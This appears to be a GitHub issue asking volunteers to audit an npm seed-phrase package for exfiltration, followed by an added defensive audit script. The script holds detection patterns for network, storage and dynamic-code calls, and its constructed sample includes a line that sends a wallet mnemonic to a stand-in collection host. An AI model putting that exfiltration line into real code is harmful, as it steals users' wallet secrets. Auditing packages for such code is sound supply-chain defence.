Calling soft auditors to vet v1.0.1 on npm
Opened this issue · 3 comments
Hi,
If you are well versed enough in JavaScript to go through the code on NPM and confirm that it doesn't include anything nasty that could exfil a user's seed phrase, that would help a lot.
The package is intended to be fixed @ ~~1.0.0~~ 1.0.1* version, so if you want to audit the code on npm which is immutable and drop a comment in this issue about it doing what it says on the tin/README, that would be appreciated by myself and skeptical potential users.
* 1.0.1 published after feedback below
Things to check:
.js files:
- do not do network calls
- do not save the seed phrase anywhere
package.json:
- only imports the algosdk package
- does not run any custom stuff like postinstall scripts
For more immutability I would pin the algosdk version to `1.18.1` (remove the `^`). That will avoid installing future malicious versions, however unlikely but possible.
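A script that mechanizes the checklist from the issue (no lifecycle scripts, only the algosdk dependency, no network or storage calls in the .js files) together with the exact-pin advice above. This is an added example, not code from the thread or from the package being audited; the package.json objects and the source text it inspects are constructed samples, and `example-seed-tool` and the file name `index.js` are placeholders. In practice the inputs come from the tarball fetched with `npm pack <name>@<version>`, which is the artifact `npm install` actually unpacks.

```javascript
// Added example (not from the thread): offline audit of an npm package against
// the checklist in the issue. It is a heuristic grep, not a proof: strings built
// at runtime or decoded from base64 slip past it, so it complements reading the
// code rather than replacing it.

// npm hooks that run automatically during install or publish.
const LIFECYCLE_SCRIPTS = [
  'preinstall', 'install', 'postinstall', 'prepare',
  'prepublish', 'prepublishOnly', 'prepack', 'postpack',
];

// Exact semver only: rejects ^, ~, ranges, wildcards, dist-tags, git and URL specs.
const EXACT_SEMVER = /^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?$/;

// I/O a seed-phrase tool has no business doing. Each entry is [regex, label].
const SUSPICIOUS = [
  [/\brequire\(\s*['"](https?|net|dgram|tls|dns|child_process|fs|os|worker_threads)['"]\s*\)/, 'node module import'],
  [/\bfrom\s+['"](https?|net|dgram|tls|dns|child_process|fs|os)['"]/, 'node module import'],
  [/\bfetch\s*\(/, 'fetch()'],
  [/\bXMLHttpRequest\b/, 'XMLHttpRequest'],
  [/\bWebSocket\s*\(/, 'WebSocket'],
  [/\bnavigator\.sendBeacon\b/, 'sendBeacon'],
  [/\b(localStorage|sessionStorage|indexedDB|document\.cookie)\b/, 'browser storage'],
  [/\bprocess\.env\b/, 'environment access'],
  [/\b(eval|Function)\s*\(/, 'dynamic code'],
  [/\bimport\s*\(/, 'dynamic import'],
  [/\bBuffer\.from\s*\([^)]*['"]base64['"]/, 'base64 decode (possible hidden string)'],
];

// Flags lifecycle scripts, dependencies outside the allow-list and inexact pins.
function auditPackageJson(pkg, allowedDeps) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of LIFECYCLE_SCRIPTS) {
    if (hook in scripts) findings.push(`lifecycle script "${hook}": ${scripts[hook]}`);
  }
  const deps = Object.assign({}, pkg.dependencies, pkg.optionalDependencies, pkg.peerDependencies);
  for (const [name, spec] of Object.entries(deps)) {
    if (!allowedDeps.includes(name)) findings.push(`unexpected dependency ${name}`);
    if (!EXACT_SEMVER.test(spec)) findings.push(`dependency ${name} not pinned exactly: "${spec}"`);
  }
  for (const key of ['bundledDependencies', 'bundleDependencies']) {
    if (pkg[key]) findings.push(`${key} present: review bundled code`);
  }
  return findings;
}

// Reports each source line that matches one of the SUSPICIOUS patterns.
function scanSource(filename, src) {
  const findings = [];
  src.split('\n').forEach((line, i) => {
    for (const [re, label] of SUSPICIOUS) {
      if (re.test(line)) findings.push(`${filename}:${i + 1}: ${label}: ${line.trim()}`);
    }
  });
  return findings;
}

// Runs both checks; `files` maps file name to file contents.
function auditPackage(pkg, files, allowedDeps = ['algosdk']) {
  const findings = auditPackageJson(pkg, allowedDeps);
  for (const [name, src] of Object.entries(files)) findings.push(...scanSource(name, src));
  return findings;
}

// Constructed sample inputs (placeholders, not the real package).
const BAD_PKG = {
  name: 'example-seed-tool', version: '1.0.0',
  scripts: { postinstall: 'node setup.js' },
  dependencies: { algosdk: '^1.18.1', 'left-pad': '1.3.0' },
};
const GOOD_PKG = {
  name: 'example-seed-tool', version: '1.0.1',
  dependencies: { algosdk: '1.18.1' },
};
const BAD_SRC = [
  "const algosdk = require('algosdk');",
  "const acct = algosdk.generateAccount();",
  "const mnemonic = algosdk.secretKeyToMnemonic(acct.sk);",
  "fetch('https://example.invalid/collect', { method: 'POST', body: mnemonic });",
  "localStorage.setItem('m', mnemonic);",
].join('\n');
const GOOD_SRC = "const algosdk = require('algosdk');\nmodule.exports = () => algosdk.generateAccount();";

console.log(auditPackage(BAD_PKG, { 'index.js': BAD_SRC }).join('\n'));
console.log('clean package findings:', auditPackage(GOOD_PKG, { 'index.js': GOOD_SRC }).length);
```

An exact pin only covers the direct dependency: algosdk's own dependencies are still resolved by range at install time unless the published package ships an npm-shrinkwrap.json, so a reviewer who wants the whole install reproducible should check for that file too (or audit the resolved tree with `npm ls`).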
Fair enough - I didn't intend to change this but why not. 1.0.1 published with fixed algosdk.
If you think the code is benign please leave a comment to this effect.
Thanks!